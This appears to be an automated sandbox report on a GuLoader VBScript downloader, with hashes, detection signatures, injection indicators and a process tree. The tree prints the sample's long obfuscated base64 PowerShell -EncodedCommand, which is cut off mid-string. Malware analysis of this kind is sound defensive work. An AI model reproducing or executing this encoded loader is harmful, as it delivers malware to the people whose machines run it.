guloader | 9629ddea649ce511246c959915ad102d25b3f616e4a4501bab4358895b38a913

General

Target

№337740.vbs
Size

139KB
MD5

95c74f0df0282a10ba41f279741f39b0
SHA1

7dcf489ca3e3ba7325f3aa9f99aac908aa02c6d8
SHA256

9629ddea649ce511246c959915ad102d25b3f616e4a4501bab4358895b38a913
SHA512

c9e743d98767dfc476e56dcd6d0346e4e31c4853fed26670e72498a83eef39cda1c0debc2a50e6c27c9072ae910c0eeffda034c6f4b306537a2859983fc19e10
SSDEEP

3072:05ksEf25PvksR3zlbbjjPrCZYF81apKPya7cZ8ZN:Z2xLVnum81aAyoJ

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4684	powershell.exe
4684	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4684	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1256 wrote to memory of 4684	1256	WScript.exe	91
PID 1256 wrote to memory of 4684	1256	WScript.exe	91
PID 1256 wrote to memory of 4684	1256	WScript.exe	91
PID 4684 wrote to memory of 3348	4684	powershell.exe	93
PID 4684 wrote to memory of 3348	4684	powershell.exe	93
PID 4684 wrote to memory of 3348	4684	powershell.exe	93
PID 3348 wrote to memory of 1768	3348	csc.exe	94
PID 3348 wrote to memory of 1768	3348	csc.exe	94
PID 3348 wrote to memory of 1768	3348	csc.exe	94

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\№337740.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1256
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "JABHAGEAcwBsAGkAZwBoACAAPQAgAEAAJwANAAoARgByAG8AawBvAEEATABzAGsAZQBkAGQAUgBhAGQAaQBvAGQATABhAHoAZwBhAC0AVABhAG4AawBlAFQAVABhAHAAcgBlAHkAUwBjAGgAaQB6AHAASABlAHIAbQBhAGUASQBuAHQAZQBuACAAUgBlAGQAZQBsAC0AUgBlAHYAZQByAFQAQwBhAGIAaQBuAHkAUwBwAHUAbQBvAHAAQQBsAGwAbwByAGUARABkAHMAcwBwAEQAQQBrAHQAaQBlAGUAVQBuAHYAbwBjAGYAYQB1AGQAaQBlAGkATQBhAG4AbwBtAG4ATABlAHAAdABvAGkARgByAGkAdgBvAHQAVABpAGwAbABiAGkATQBvAHQAbwByAG8AUwBhAGQAZQBsAG4ARwB1AGwAcABlACAARABlAHMAZQByAEAAUgBlAGEAZABqACIACgBXAG8AcgBrAGwAdQBpAG4AZABvAGsAcwBNAGIAZQBsAHAAaQBTAHQAaQBsAGsAbgBTAHAAbwByAHQAZwBTAHQAYQByAHQAIABJAG4AbgBvAGMAUwBVAG4AYwB1AG0AeQBMAHkAbQBwAGgAcwBEAHIAaQBuAGsAdABDAGEAbAB5AGMAZQB0AGEAcgBhAHgAbQBzAGgAYQB3AHkAOwAKAEUAbABlAG0AZQB1AEYAaQBkAGUAbABzAEMAaABhAHMAdABpAEEAcgBiAGUAagBuAEgAbwBpAHMAZQBnAFQAeQByAGUAbgAgAE8AcgBpAGUAbgBTAGwAaQBuAGcAYgB5AEMAbwB1AG4AdABzAFMAdABhAGIAaQB0AEIAcgBvAGQAZQBlAE0AbwBkAGUAbABtAHMAcABvAG4AZwAuAFQAcgBpAHAAZQBSAEUAZwBlAG4AcwB1AEgAbwB2AGUAZABuAHMAZQBiAHUAbgB0AEMAYQBsAGwAbwBpAEIAbwB0AGEAbgBtAFQAbwBwAGEAegBlAFAAaQByAGEAdAAuAE8AdgBlAHIAZABJAFQAeQByAGsAZQBuAEMAYQBtAHMAZAB0AFMAdQByAHIAbwBlAFYAYQBsAG0AdQByAFAAbAB1AG0AZQBvAEIAYQByAGQAdQBwAE4AZwBsAGUAbwBTAEsAbwBvAHQAYwBlAHMAYQBsAGEAdAByAEsAbwBnAGUAZwB2AFoAZQBzAHQAZgBpAFYAbwBsAGMAYQBjAEwAYQB0AGkAcwBlAEwAawBrAGUAcgBzAFAAcgBlAGYAZQA7AAoASgBvAGsAZQBsAHAARQBmAHQAZQByAHUARwByAHUAbgBkAGIAVgBhAHIAZQBkAGwAQwBvAG0AbQBlAGkARABlAHIAcwBvAGMARQBzAHQAcgBhACAATQBpAGMAcgBvAHMAVQBkAGsAbwBiAHQAaAB1AG4AYwBoAGEAUwB5AG0AYgBpAHQATgBhAG0AZQB2AGkATQB1AHMAbABpAGMAUwBlAGwAZQBmACAAUgBhAGkAbgBiAGMAQgBvAHIAZABrAGwATQBhAHMAawBpAGEAQwBhAGMAbwB6AHMASgB1AGcAYQB0AHMARwBpAHQAYQBuACAASgByAGcAYQBzAE8ASwBsAGkAZQBuAHYATAB5AGQAcwBrAGUATgBpAHQAdABpAHIATABvAGcAaQBzADEACgBEAHIAaQBrAGYAewBuAGUAdABlAG8AWwBTAGwAdQBtAHMARABHAGUAbgBsAHMAbABFAHAAaQBjAGUAbABNAGkAcwBlAG4ASQBQAHIAYQBlAHMAbQBTAHkAbgBhAG4AcABCAHIAeQBnAGcAbwBLAHIAdQBkAHQAcgBwAHUAawBsAGUAdABEAHUAbwB0AHIAKABQAG4AZQB1AG0AIgBDAG8AcABwAGkAdwBUAGgAeQByAGUAaQBGAGEAcgB2AGYAbgBQAG8AbAB5AG0AcwBUAGEAZwBlAHQAcABGAHkAcgBzAHYAbwBTAHAAbwBpAGwAbwBCAG8AdQBjAGgAbABSAG8AdAB0AGUALgBWAGkAawB0AHUAZABBAGYAZwByAHMAcgBaAG8AbwBzAHAAdgBCAGwAbwBuAGQAIgBBAGsAdABpAGUAKQBQAGUAbgBnAGUAXQBJAG4AdABlAHIAcABLAGwAYQBtAG0AdQBCAGwAbwBvAGQAYgBNAGkAbgBpAHMAbABEAHkAZgBmAGUAaQBVAG4AZABnAGwAYwBBAG4AdABpAHAAIABTAGUAcgB2AGkAcwBXAGUAbABsAHEAdABBAGkAdgBlAHIAYQBUAG8AZQBuAGEAdABTAGgAbwBzAGgAaQBQAGwAYQBuAHQAYwBzAHUAawBrAGUAIABSAGUAZgBpAG4AZQBTAHQAZQB0AGUAeABhAG4AaQBjAHUAdABEAGEAbgBuAGUAZQBCAGkAbABzAGgAcgBRAHUAZQBlAG4AbgBEAHUAbQBtAGUAIABIAHkAcABvAHMAaQBWAG8AbABhAHQAbgBCAGUAZwBlAGoAdABIAHkAZAByAG8AIABTAHAAZQByAG0ARwBTAGkAZwBuAGEAZQBHAG8AZABzAHYAdABUAG8AbAB1AGUARgBKAHUAcwB0AGUAbwBQAHUAbABwAHcAcgBBAHAAcwBpAGQAbQBNAHkAdABoAG8AKABVAG4AZABlAHIAaQBTAG8AbABmAGEAbgBCAHUAcwBlAG4AdABEAGUAbABpAGsAIABhAHgAbwB0AG8AUwBEAGkAYQBrAG8AawBGAHIAZwBlAGgAcgBNAGkAbABpAGUAaQBBAG4AdABpAGoAdgBEAHUAcABsAGkAZQBQAGEAcgBrAGkALABBAHMAdAByAG8AaQBKAGUAbgBzAHkAbgBTAHQAZQBuAGgAdABOAHMAawBlAGQAIABLAHIAYQBrAGUAUwBNAG8AcgBkAHYAawBPAHgAeQBwAHIAbwBzAHUAYwBjAGUAbABLAG8AcgBlAHQAZQBDAG8AeQBzAHQAZABQAGEAcgB2AGUAMQBLAG8AcwBtAGUANwBKAGEAYwBxAHUANwBGAHIAaQBhAGIALABQAGEAaQByAHAAaQBOAHUAbABsAGUAbgBTAHQAcgBhAG4AdABDAG8AbgB0AGEAIABUAGkAbABlAG0ASwBBAGwAdABpAGMAYQBEAHYAcgBnAGsAcgBBAHQAdAByAGEALABSAGUAZgBvAGwAaQBPAHMAdABlAHIAbgBPAG0AZQBuAGkAdABGAG8AcgBzAHkAIABXAGUAcgBlAGMARQB0AHIAbwBkAHMAdABFAHAAbwBzAGUAcgBCAGEAcgBkAGUALABVAG4AZwB1AGkAaQBNAGUAZABpAGMAbgBHAG8AbABkAGYAdABEAGkAcwBjAGkAIABLAG8AbgB0AHIAVgBUAHkAcABvAG4AaQBIAHUAcgB0AGkAdABMAGEAZwBlAHIAYQBWAGQAZABlAGwAbQBVAGIAZQB0AHYALABEAGkAYQBiAGUAaQBKAG8AbABsAGkAbgBEAGkAcwBjAHIAdABNAGkAbABqAGEAIABQAG8AbAB5AGgAQgBSAHUAbgBkAGgAYQBLAGEAbABlAGkAZwBpAG4AdABvAHIAdABNAHUAbAB0AGkAYQBDAG8AbQBtAGUAbABLAHYAbwB0AGUAKQBCAGUAcwBrAHIAOwAKAFMAYwB1AGwAbABbAE4AbwBuAGEAcwBEAE8AcABsAHMAcwBsAEUAbgBjAGgAaQBsAFMAawBvAHYAbABJAEYAbwByAGgAaQBtAFQAcgBpAGsAbwBwAEIAbwByAHQAbwBvAEwAaQBuAGcAdQByAFQAaABhAGwAYQB0AFQAYQBuAGQAZQAoAFcAYQBtAGIAbAAiAEMAaABhAGUAdABzAEQAcgBhAGcAbwBoAEMAbwBtAHMAeQBlAFMAdQB0AHQAZQBsAEUAYQByAHQAaABsAEcAbAB5AGMAbwAzAGQAaQBzAGgAZQAyAFEAdQBhAGQAcgAuAFIAZQBpAGMAaABkAEEAZgB0AGUAbgBsAFUAbQBvAHIAYQBsAE0AYQB0AHIAaQAiAEIAYQBnAGgAYQApAE4AbwBuAGIAbwBdAEQAaQBwAGgAdABwAFIAbwBkAHIAaQB1AFAAaABvAHQAbwBiAFUAbgB0AHIAYQBsAEIAcgBvAG0AaQBpAEIAbwBlAHQAaABjAEIAaQBtAHAAbAAgAGQAbwBtAG8AcgBzAFMAbQBpAGQAZwB0AFIAZQBzAHQAYQBhAHAAYQBkAGwAZQB0AEIAbABlAGcAZgBpAFIAZQB0AHIAaQBjAEEAYwBvAHUAYwAgAEMAaABhAHIAbABlAEwAdQBuAHQAZQB4AEEAbAB1AG0AaQB0AEEAbgBnAGkAbgBlAFAAbABhAGkAYwByAEYAbwByAHQAeQBuAEQAbwBsAGwAYQAgAEYAbABsAGUAcwB2AE0AZQBsAGwAZQBvAFAAaQB0AGgAZQBpAGQAZQBnAGUAbgBkAEsAbgBrAGYAbAAgAEYAbwByAHMAawBTAHQAZQByAHIAbwBIAE0AbwBzAGUAaABGAEYAcgBhAGsAdAByAEYAbwByAHMAawBlAEkAbgB2AG8AbABlAFMAawBkAGUAcwBOAE8AYgBvAGwAdQBhAFMAaQBuAGcAbABtAFUAbgByAGEAbgBlAFUAZAByAGUAZwBNAG8AcABzAHAAYQBhAFQAcgBpAGcAbABwAEQAbwBnAG0AYQBwAEgAbwB2AGUAZABpAFIAYQB1AGsAbABuAEEAYwBoAGwAbwBnAFYAZQByAGQAZQBzAEsAcgBpAG0AbQAoAEEAbAB0AGkAbgBpAGcAYQBiAGYAZQBuAFMAdABpAGsAawB0AEkAbgBjAG8AbQAgAFQAaAB5AHMAYQBTAEQAcgBvAHMAawBvAEYAbABhAGcAZQBsAE8AdgBlAHIAZABpAFQAaQBsAHIAZQBkAFQAbwByAG4AZQBpAEwAYQBrAHIAaQAyAFQAaQBsAGsAbwA5AFMAdABlAG4AYgApAEUAdABoAG8AbAA7AAoAWAB5AGwAbwBmAFsATwB1AHQAcwBpAEQARABvAGsAdQBtAGwAZABhAG0AcABlAGwARQB2AGUAbgBoAEkASQBuAGQAcwBtAG0ARABhAHQAYQBzAHAAQwBvAG4AcwBjAG8AZwBlAG4AYgByAHIAVQBuAGQAZQByAHQAbgBlAHIAZABoACgATgBvAGsAawBlACIATQBvAG8AZABpAHUASQBuAHQAZQByAHMAQgBhAHIAZQByAGUATQBhAG4AZwBvAHIAQQBsAHAAYQBiADMAVABhAHAAcABlADIAUwBrAHIAbwB0ACIATQBhAHIAbQBvACkAQQBtAHQAcwB0AF0ATgBvAG4AYQBwAHAAUgB1AG4AZABzAHUAQQBnAHUAZABpAGIARgByAGEAZwBhAGwAVwBpAHMAaABiAGkARABlAHIAYwBvAGMASABlAGYAdABpACAAVQBzAHkAbgBsAHMAVQBwAHQAaQBlAHQAUwBvAGQAYQB2AGEAVABlAG4AZABvAHQATABpAGcAZQBkAGkARgBvAHIAcwBpAGMATQBpAG4AZABlACAASwBvAG4AdABvAGUAQgBsAG8AdwBmAHgAQQBuAHQAeQBkAHQAUABsAGEAdABvAGUARgBlAHIAbQBlAHIATABlAHcAbgBpAG4AUwBjAG8AbwB0ACAATQBpAHMAcABlAGkAQwByAGkAYgBiAG4AUgBlAGoAcwBlAHQATABhAG4AZwBzACAAQwBhAHIAYQBjAEMAbwBmAGYAZQByAHIAUAByAGUAYgBsAGUAUwBhAGEAcgBlAGEAUwB0AHkAcgB0AHQASAB5AGQAcgBvAGUARgBlAGIAZQByAEQAVABhAG4AZAB0AGkARgBvAHIAbABhAGEAUwBrAHIAdQBkAGwAUgBhAGQAaQBhAG8AQQBmAGYAYQBsAGcAYQBmAHYAaQBrAFAAUABhAHMAdABlAGEAYQBsAGIAdQBxAHIAYgBlAGEAbQBpAGEAVABpAHAAbABvAG0ASQBzAGEAbABsACgASABhAGwAdABlAGkARgBvAHIAdQByAG4AVQBuAHMAbgBhAHQAUABhAHIAdABzACAAYgBpAHIAawBlAEsATgBpAGcAaAB0AGkAUABvAGQAZQB2AGwAQgBhAHIAZABlACwAQwBoAHIAZQBzAGkAQgBvAHIAdABhAG4AcAByAGUAcwBzAHQAVQBuAHMAbABhACAAUwBrAHUAcgBrAEIAVABoAGkAYwBrAGwAQgBpAHMAdABhAGEAYQByAG0AZQBuAGIATgBhAHQAaQBvAGIAUwBrAGEAcgB2AGkAUAByAG8AcABhADEATQB1AHIAbQB1ADcAUgBhAGMAYwBvADUARgByAGUAcgBiACwAQgBvAHIAZwBlAGkASgBvAHMAaABpAG4AUABhAGMAaAB5AHQAUwBlAGwAZQBuACAARgBsAGkAZwBoAFQARAB5AGIAZABlAHYAUwBlAGwAZABvAGEAUgBpAHAAZQBsAG4ARABhAHQAYQBtACwASwBuAGUAYQBkAGkAUABhAHIAYQBwAG4ATQBvAHIAZABlAHQAZwBhAHMAbQBhACAATwBwAGkAbgBpAFYARgBvAHIAZQB2AGkASABvAG0AbwBnAGcASQByAHIAZQBtAGEAUgBlAGoAbwBsACwATQBhAHAAcABlAGkATgBvAG4AcwB1AG4ATQBhAHIAYwBpAHQAagBpAGcAZwBlACAAZQByAGkAbgBkAE0ARQBuAHMAcAByAG8AbQBpAHMAYQBuAG4AUAByAG8AYgBhACkATAB1AHIAaQBrADsACgBBAGMAYQByAGkAWwBFAGMAYgBvAGwARABEAGkAcwBpAG4AbABCAHkAZwBnAGUAbABTAGEAdQB0AGUASQBzAHQAaQBuAGsAbQBTAHQAaQBsAGwAcABCAG8AZwBzAGsAbwBQAGgAcgBhAGcAcgBCAGwAbwBkAHQAdABCAG8AcgBlAHUAKABSAGUAbABhAHgAIgBvAHYAZQByAGwAawBTAGYAbwByAGsAZQBBAGwAbQBzAGcAcgBJAG4AcwB0AHIAbgBIAG8AcgBuAHAAZQBTAGsAeQBkAGUAbABJAG4AaABlAHIAMwBCAHUAZwB0AGgAMgBTAHUAaQBzAHQAIgBBAG4AawBvAG0AKQBTAG8AdQBrAHAAXQBTAGUAcAB0AGUAcABVAHIAbwB2AGEAdQBJAG0AcAByAGEAYgBMAGEAbgBnAHMAbABGAHIAdQBtAHAAaQBSAGUAYgBvAHUAYwBEAGEAdABhAGUAIABUAGUAbwByAGkAcwBBAGwAbABvAHQAdABTAHUAYgBjAHUAYQBPAHYAdQBsAGkAdABPAHIAZABrAGwAaQBzAHAAaQBmAGwAYwBTAGEAbQBsAGUAIABTAGEAbABnAHMAZQBGAGUAbABkAGkAeABCAGEAawBrAGUAdABBAG4AdABpAHEAZQBTAHUAYgBvAGIAcgBMAGUAZwBlAG4AbgBiAHIAbwBkAGUAIABUAGEAbgBpAHMAdgBHAGkAdgBpAG4AbwBDAGkAdgBpAGUAaQBEAGkAbwBsAGUAZABFAGMAaABlAHYAIABTAHAAaQBzAGUARwBUAG8AbAB1AGUAZQBVAG4AcwBsAGUAdAB0AHkAcABlAHMAUwBNAGEAbgBvAG0AdABEAGkAcwByAGUAYQBCAGkAbABsAGkAcgBUAHIAbwBwAG8AdABPAHAAZwBhAG4AdQBIAHUAbgBkAHIAcABCAGUAbgB6AG8ASQBNAGkAZABzAHQAbgBzAGwAaQBiAGIAZgBGAGoAZQByAG4AbwBQAHMAZQB1AGQAKABUAG8AbQBtAGUAaQBBAG4AdABlAG4AbgBUAHMAZQBhAGcAdABVAGQAYgB1AGQAIABzAGUAawB0AGUAVABLAG4AZQBiAGUAYQBCAHUAZABnAGUAcgBtAGkAbgBkAHIAbQBJAGQAbwBsAG8AMQBGAHIAcABlAHIAMQBTAGEAawByAG8ANABBAGQAcgBlAG4AKQBLAG8AZABuAGkAOwAKAEUAcgBvAGIAcgBbAFcAaABlAHIAZQBEAFMAYQBuAGkAdABsAEsAaQBuAGQAbABsAFMAawBhAGsAdABJAG4AZQB3AHMAYQBtAFkAdAB0AHIAaQBwAFYAZQBqAGEAcgBvAEIAZQBmAHIAeQByAFMAdAB5AHAAcwB0AEUAagBsAGUAcgAoAE0AbwBpAHIAZAAiAE4AYQByAGMAbwB1AFMAbAB1AGIAYgBzAGYAbABpAHIAdABlAE0AYQBzAGsAaQByAEIAYQBnAHMAbQAzAFIAYQBhAGQAcwAyAE0AYQBuAGYAdQAiAEcAYQBuAGEAbQApAFYAZQBqAGsAcgBdAE0AZQB0AGUAbgBwAFIAZQBkAGkAZwB1AE0AZQByAHIAZQBiAGYAbwBuAGUAdgBsAEIAbABvAGQAYQBpAEEAbgBtAGUAbABjAFYAaQBsAGoAZQAgAE4AYQB0AHQAZQBzAFIAZQBwAHUAYgB0AE8AdgBlAHIAYgBhAHMAZQBrAHMAdAB0AFUAbgBkAGUAcgBpAEUAZwBhAGQAcwBjAFIAZQBzAHAAaQAgAE0AYQBuAGsAbwBlAFUAbgB3AGkAbgB4AEsAYQBsAGsAawB0AEEAcwBzAGkAbQBlAE8AcgBhAHIAaQByAEIAbwB5AGEAcgBuAHUAbgBhAGcAZwAgAEYAbwBsAGsAZQBpAE0AYQBjAHIAbwBuAEYAbABvAGsAaQB0AFMAbwBsAHMAawAgAEIAaQB6AGEAcgBDAFUAbgBuAGkAdAByAEUAdgBlAGwAeQBlAE8AYgB0AGUAbgBhAEIAbwByAGQAdgB0AGcAYQBzAHIAYQBlAEIAaQBmAGEAbABJAEEAYgBvAG4AbgBjAEQAbwBsAGkAYwBvAEEAbABvAGMAaABuAFMAbgBhAGsAcwBJAFAAcgBhAGsAdABuAEQAaQBzAHQAcgBkAFYAZQBqAHAAbABpAEkAbgBmAHIAYQByAHMAawB1AG4AawBlAE4AaQBoAGkAbABjAEgAeQBwAG8AdAB0AFQAbwBuAG4AaQAoAEQAdQBsAGMAaQBpAEkAcwBzAHUAZQBuAFQAcgBhAGcAZQB0AEEAcgBnAG8AdgAgAFUAbgBpAG4AcwBEAEsAYQBuAHUAdABhAG8AcgBuAGEAbQByAEYAcgBlAGQAbgBrAEcAbwB1AHIAbQAxAFMAbwB1AG4AZAA2AEIAdQB0AGMAaAA3AEUAeAB0AHIAYQApAEwAbwBiAG8AbAA7AAoATgBhAHQAaQBvAFsAVABlAGsAcwB0AEQAUABhAHIAYQBsAGwAUwB0AGkAYwBrAGwAQwBsAHkAcABlAEkAYwBoAGEAZQB0AG0AUgBhAHAAbgBkAHAAVgB1AGcAZwBlAG8ASgB1AHMAdABsAHIARwBvAHUAZAB5AHQARgBlAGQAdABlACgAYgBlAHQAeQBuACIAVAByAGEAYwBoAHUARABlAHQAcgB1AHMAVQBuAGIAcgBlAGUAVQByAGkAbgBvAHIARABqAHYAbABlADMARABpAHMAdABhADIAUwB1AHAAZQByACIASwBvAGwAbABlACkATABlAGQAZQBsAF0ASABlAGwAbABpAHAAUgBvAHQAdABlAHUATQBhAGgAbwBnAGIAUwBrAGEAZQByAGwARABpAHMAZgBhAGkAQgBqAGUAcgBnAGMAVgBlAHIAbQB1ACAAVABoAHUAbgBkAHMAWgB5AGcAbwBtAHQARgBhAGMAcgBkAGEAcABhAHIAbgBhAHQAVQBkAHMAeQByAGkASQBuAHQAcgBlAGMAQgBzAHMAZQBrACAAUwBpAGQAZQByAGUATwB2AGUAcgBlAHgAQgBpAHMAbQBlAHQASwBhAHIAdABlAGUAQQBnAGkAdABlAHIAUwBsAGkAawBwAG4AQQBmAGcAaABhACAAUAByAG0AaQBzAGkATQBlAGQAcABsAG4AUAByAGUAcwBwAHQATQBhAHIAcwBrACAAUABsAGUAbgBzAEcATQBhAHYAZQBkAGUAVgBhAHMAaQBsAHQAVABhAG0AZQByAEQAVQBkAGcAYQB2AGwASgBhAGcAcwBjAGcASABpAGUAbABhAEkAUwBrAGkAYgBzAHQAVABlAG4AZABlAGUAUgBlAHAAZQByAG0ASABhAGEAbgBkAEkAVAByAHkAZwBnAG4ASQBuAGcAYgBlAHQARwByAGEAYQBuACgAQQBmAGwAaQByAGkARwB1AG4AcwBtAG4AQQBuAG4AZQBtAHQATAB1AGYAZgBhACAAUwB5AHYAcwB0AEQARgBvAHIAdQByAGkAUABzAGUAdQBkAG4ARwByAHUAbgB0AG8AbwBtAHYAdQByAHMAcABsAGEAeQBsACwARABlAGMAaQBtAGkAQQBmAHMAZQBuAG4AUwB0AGUAbgB0AHQARQBmAHQAZQByACAATgBlAG0AYQB0AFMAVQBuAHMAaQBtAHYAUwBtAGEAYQBmAGkAUwBpAGwAdgBlAGcATQB5AG8AcwB5AGUAVQBuAHMAbwBwAHIAUwB1AGIAbwByACwATABhAGUAcwBlAGkAVQBkAHAAbgBzAG4AVgBpAHIAYQBzAHQAUwBvAGwAZwB1ACAAcwB0AHYAaAB0AEEARABpAGEAZwByAHQASwBvAGQAZQBzAGgARwBhAHUAZABpAGwAUwB5AG4AbwBuACwAVgBpAGQAdQBuAGkAUwBlAGsAdQBuAG4AQQByAG4AdQBzAHQARABlAG4AcwBpACAASQBuAHQAZQByAFIATABlAHAAaQBkAG8ARAB5AHIAZQB0AGsAVAByAGkAbABsAGsASABpAGQAaAByAGUAWgBvAG8AZgB5AHIARgBvAHUAbABzACkASABqAGUAcgB0ADsACgBCAGkAZgBhAGwAWwBCAGEAbgBnAGsARABBAHMAdwBpAG0AbABJAG4AdABlAHIAbABUAGkAbgBkAGkASQBDAGEAZgBmAGUAbQBiAGEAbAB0AGUAcABMAGUAbgBpAGUAbwBXAG8AbABmAHIAcgBTAHQAbgBrAHMAdABEAGUAYgBvAHIAKABPAHUAdABjAHIAIgBNAGEAdABlAHIAdQBSAGkAZABlAGIAcwBrAGwAaQBzAHQAZQBDAGUAbgB0AGkAcgBWAGEAcgBtAGUAMwBGAGwAbwB0AHMAMgBCAGUAbgBiAHUAIgBLAGEAcwBzAGEAKQBCAGkAdABpAG4AXQBEAG8AawB1AG0AcABCAHIAbwBwAGUAdQBQAHIAZQBiAGUAYgBMAG8AdgBvAHYAbABDAGEAbQBvAHUAaQBSAGUAZwBpAG8AYwBFAG4AagBvAGkAIABTAGkAbQB1AGwAcwBBAGYAbQBpAGwAdABGAGwAdQBvAHIAYQBMAHMAcgBpAHYAdABLAGwAdQBuAHQAaQBWAGkAawB0AHUAYwBTAHQAaQBnAGUAIABVAGQAbABpAHMAZQBIAGUAbQBtAGUAeABUAGUAbABlAHgAdABQAHIAaQBtAHMAZQBJAHMAZABlAHMAcgBJAG0AcABsAGEAbgBCAGEAZwBsAGEAIABWAGEAYQBnAGUAaQBUAGEAcgB0AGUAbgBDAGUAbQBlAG4AdABNAGUAdABhAGcAIABVAGIAZQBzAGsASQBDAGgAcgBvAG0AcwBrAGUAeQBwAHIAWgB0AGkAbgBlAGEAbwBIAGEAYQBuAGQAbwBJAG4AZABsAGcAbQBQAHIAbwBwAG8AZQB0AHIAZQBtAHUAZABOAG8AbgBhAHAAKABGAGkAbAB0AGUAaQBQAG8AYwBrAG0AbgBwAHIAYQBnAHQAdABQAGwAZQBiAGUAIABBAHAAcwBpAHMARABJAG4AdgBlAG4AYQBHAHIAZQBuAGUAZABTAGsAYQBsAGEAKQBMAGkAdgBzAG0AOwAKAFQAbwBtAGgAZQBbAHMAbwBwAGgAaQBEAEEAbgBlAHAAaQBsAEEAYwBhAHIAbwBsAEMAbwBuAHQAYQBJAFAAcgBvAHMAaQBtAEIAZQBmAHIAdQBwAFMAYwBlAG4AZQBvAEEAcgBjAGEAZAByAFAAcgBpAG0AdQB0AFAAaABpAGwAbwAoAE0AYQBsAGUAcwAiAEcAcgB1AHAAcABrAEIAcgBlAHYAcABlAEEAbQBiAGkAdAByAE8AcABmAGEAdABuAFIAZQBkAG4AaQBlAEYAcgBlAGsAdgBsAFMAdABlAGoAbAAzAEgAeQBkAHIAbwAyAEYAbABlAHIAdAAiAHUAbgBlAG0AZQApAEsAbwBuAHQAbwBdAEQAaQBwAGwAbwBwAFIAZQBsAGUAdgB1AEwAbwBiAHMAYwBiAFMAdAB2AGIAbwBsAFQAaQBsAHMAdABpAFMAawB1AG0AcgBjAFUAbgB0AGkAbAAgAFAAbABhAHMAbQBzAFYAYQByAGkAZgB0AEYAcgBhAHMAbwBhAEIAYQBnAGwAbwB0AE0AYQBsAHQAYQBpAFIAbwBxAHUAZQBjAEEAbgBkAGEAbAAgAEwAdQBkAGUAZABlAEsAbABhAHQAdAB4AEwAYQBrAHIAaQB0AFMAdABhAHIAdABlAHUAbgBoAGUAcgByAEQAZQBmAG0AcgBuAEwAYQBuAGQAcwAgAFQAZQBhAHIAYQBpAEQAYQB0AGEAZgBuAE0AYQByAGcAYQB0AEkAbgBkAGUAcgAgAEQAZQBjAGUAbgBWAFMAcABvAG4AcwBpAEYAcgBlAG0AcwByAFMAaQBuAGsAcwB0AEUAawBzAG8AdAB1AEYAbwByAHMAawBhAFMAdQBiAG0AZQBsAEYAcgBhAHQAcgBBAEYAbwBvAGwAaABsAFYAYQBjAGMAaQBsAEMAbwByAGsAcwBvAFQAaABlAG8AbQBjAHMAdgBhAGoAbgAoAFAAZQBwAGUAcgBpAEIAZQBzAHQAaQBuAEIAYQBuAGsAcAB0AFQAcgBvAHMAZgAgAEIAYQBnAGcAcgB2AEkAbgBkAGUAdAAxAFQAagBlAG4AZQAsAFMAaQBnAG4AYQBpAFIAbwBtAGEAbgBuAE0AdQBsAHQAaQB0AFYAYQBlAHIAZQAgAEYAaQBzAHMAZQB2AEEAZwBpAHQAYQAyAEgAYQB1AGwAYQAsAGEAYwByAG8AdABpAE0AaQBzAHIAZwBuAFIAdQBuAG4AaQB0AEwAZQB0AG0AZQAgAEEAZwB0AGUAcgB2AFAAaQBzAHQAYQAzAE0AYQBzAGsAZQAsAEEAYQBsAG4AZABpAFYAbwBsAGQAdABuAE4AbwBuAGQAaQB0AEsAbwBuAGYAZQAgAEsAZABiAGoAZQB2AFIAZQBuAHQAZQA0AEkAbgB0AGUAcgApAE0AYQBuAGgAYQA7AAoATABlAGoAcgBzAFsAUwBlAHAAdABlAEQAVAB1AGYAZgBjAGwAUAB1AG4AYwB0AGwASAB5AGQAcgBhAEkAUAByAGEAeABpAG0ASwBvAHIAdQBuAHAAUAB1AHAAaQBsAG8AWABhAG4AdABoAHIAQQBsAHAAaABlAHQAUwB5AG4AawByACgAQwBvAGQAZgBpACIAUwBtAGEAbABmAGsATwBwAHQAcgB5AGUASgBlAHIAbwBuAHIAVAByAGkAYwByAG4AUwBrAHIAYQBiAGUAUwBjAGEAZwBsAGwATwBtAG0AZQBzADMAQgBhAG4AZABzADIASABlAGwAaQBwACIASAB5AHAAZQByACkAUwB0AGEAbgBsAF0ASQBtAHAAYQBnAHAATABhAG4AYwBlAHUAQQBtAGEAZwBlAGIAdgBlAGQAawBlAGwARgBvAHIAZAByAGkAZQB1AHIAaABvAGMASgB1AHMAdABpACAARgBvAHIAbQBhAHMAUwB1AGIAYwBlAHQATwBrAHQAYQB2AGEAVABpAGQAcwBzAHQAUAByAGUAYQBzAGkAUwBlAG0AaQBkAGMAQgBhAGMAawBjACAAbQBhAHIAbABvAGUAQgBpAGQAcgBhAHgAVQBmAG8AcgBuAHQAQwBhAHAAZQBsAGUASQBuAGoAdQByAHIAUwBrAHUAbABsAG4AUwB1AHAAZQByACAAQQBmAHIAaQBnAEkAVAByAGEAcABlAG4AQQByAG0AYgByAHQATgBzAHQAYgBlAFAARgBvAHIAcwB2AHQAYQBmAGgAcwB0AHIAUwBhAG0AbQBlACAAUAByAG8AbQB1AEUAVABvAGwAcwBlAG4ARwBhAHkAbgBlAHUARgB1AG4AZABoAG0ASgBvAHUAcgBuAFMAQQB0AG8AbQB0AHkAQgBvAHMAZQBsAHMAUwBpAGIAYgBlAHQARgBhAGkAcgBmAGUAUwBuAGEAawBlAG0AVABlAGsAcwB0AEwARgB1AGwAZAB0AG8ARgBvAHIAcwBvAGMARgBvAHIAbgB5AGEARgBvAHIAYgBlAGwAQQBmAGIAcgB5AGUAQgBpAGIAbABpAHMATgBhAGEAZABlAEEAVQBkAHQAcgBhACgATgBvAG